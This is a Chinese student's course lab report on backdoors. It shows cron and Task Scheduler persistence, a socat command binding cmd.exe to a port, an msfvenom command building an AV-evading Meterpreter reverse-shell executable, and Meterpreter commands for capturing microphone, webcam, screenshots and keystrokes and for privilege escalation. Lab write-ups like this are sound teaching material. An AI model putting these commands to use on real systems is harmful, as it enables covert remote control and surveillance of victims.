20155204 王昊《网络对抗技术》EXP2 后门原理与实践

20155204 王昊《网络对抗技术》EXP2 后门原理与实践

1、实验内容

准备工做（试用ncat、socat）

1. 使用netcat获取主机操做Shell，cron启动。

• 明确目标：要利用crontab命令从Windows得到linux的shell。
• 在Windows下监听自定端口。
• 用man命令查询crontab命令用法
• 使用crontab -e指令编辑定时任务。（前面的数字是你想要让他在每一个小时的某分钟运行）
• 等到本身设定的分钟数后，获得了linux的shell。
  

2. 使用socat获取主机操做Shell, 任务计划启动。

• Windows下搜索任务计划工具，打开后建立任务（自定义名称），而后新建触发器。
• 程序和脚本选择socat.exe路径，添加参数要写tcp-listen:5204 exec:cmd.exe,pty,stderr，用来将cmd.exe绑定到端口5204，同时把cmd.exe的stderr重定向到stdout上。
• 建立完成后，再次进入系统（能够经过锁定计算机来完成），发现任务已经在运行。
• 在linux环境下输入指令socat - tcp:172.30.4.71:5204，这里的第一个参数-表明标准的输入输出，第二个流链接到Windows主机的5204端口
  

3.使用MSF meterpreter（或其余软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

• 选用难一点的指令

msfvenom -p windows/meterpreter/reverse_tcp -x ./20155204.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=1 LPORT=5204 -f exe > 20155204_backdoor.exe

• 参数说明：

-p 使用的payload。payload翻译为有效载荷，就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
    -x 使用的可执行文件模板，payload(shellcode)就写入到这个可执行文件中。
    -e 使用的编码器，用于对shellcode变形，为了免杀。
    -i 编码器的迭代次数。如上即便用该编码器编码5次。
    -b badchar是payload中须要去除的字符。
    LHOST 是反弹回连的IP
    LPORT 是回连的端口
    -f 生成文件的类型
    > 输出到哪一个文件

• 生成后门程序后，能够经过nc传到Windows下，利用vmware的加强功能能够直接把文件拖过去（此过程杀毒软件会报警，关掉它或者忽略）
• 在Kali上使用msfconsole指令进入msf控制台，使用监听模块，设置payload，设置反弹回连的IP和端口。

• 这里必定注意理解反弹端口的意义，以及LHOST的意义，不要像我同样，把LHOST一直设成了被攻击主机的IP。。。（下面这个是错误图片）
  

• 设置好后能够开始监听，用exploit
• 在Windows里双击运行后门程序

• linux便得到了远程控制的shell
  

4. 使用MSF meterpreter（或其余软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

• 使用record_mic指令能够截获一段音频。
• 使用webcam_snap指令可使用摄像头进行拍照。
• 使用webcam_stream指令可使用摄像头进行录像。
• 使用screenshot指令能够进行截屏。
• 使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录。
• 先使用getuid指令查看当前用户，使用getsystem指令进行提权。（这里提一下，我周围用win7虚拟机的同窗好像都会出错，可是我用的是PC自己的系统，直接就行了。同窗的问题我也不会解决。。）
  
  
  

2、基础问题回答

1. 例举你能想到的一个后门进入到你系统中的可能方式？

• 答：在Unix里,login程序一般用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令. 若是用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将容许入侵者进入任何账号,甚至是root.因为后门口令是在用户真实登陆并被日志记录到utmp和wtmp前产生一个访问的, 因此入侵者能够登陆获取shell却不会暴露该账号。

1. 例举你知道的后门如何启动起来(win及linux)的方式？

• 答：1．操做系统自带服务； 2．网络协议捆绑； 3．软件编写者制做； 4．漏洞攻击后放置； 5．社会工程学等相关方式。

1. Meterpreter有哪些给你映像深入的功能？

• 答：录屏、录按键、提高权限都很强， 这种功能一旦落入坏人手里就很危险了。。。

1. 如何发现本身有系统有没有被安装后门？

• 答：

1. 检测网络链接，可使用Windows自带的网络命令来看看谁在链接你的计算机。具体的命令格式是:netstat -an 这个命令能看到全部和本地计算机创建链接的IP，它包含四个部分——proto(链接方式)、local address(本地链接地址)、foreign address(和本地创建链接的地址)、state(当前端口状态)。经过这个命令的详细信息，咱们就能够彻底监控计算机上的链接，从而达到控制计算机的目的。
   2.检查帐户，先在命令行下输入net user，查看计算机上有些什么用户，而后再使用“net user+用户名”查看这个用户是属于什么权限的，通常除了Administrator是administrators组的，其余都不是!若是你发现一个系统内置的用户是属于administrators组的，那几乎确定你被入侵了，并且别人在你的计算机上克隆了帐户。

3、实验总结与体会

此次实验让我感觉到了本身系统的安全性，在黑客面前就想他们口中的肉鸡同样，这让我更加认识到了信息安全的重要性。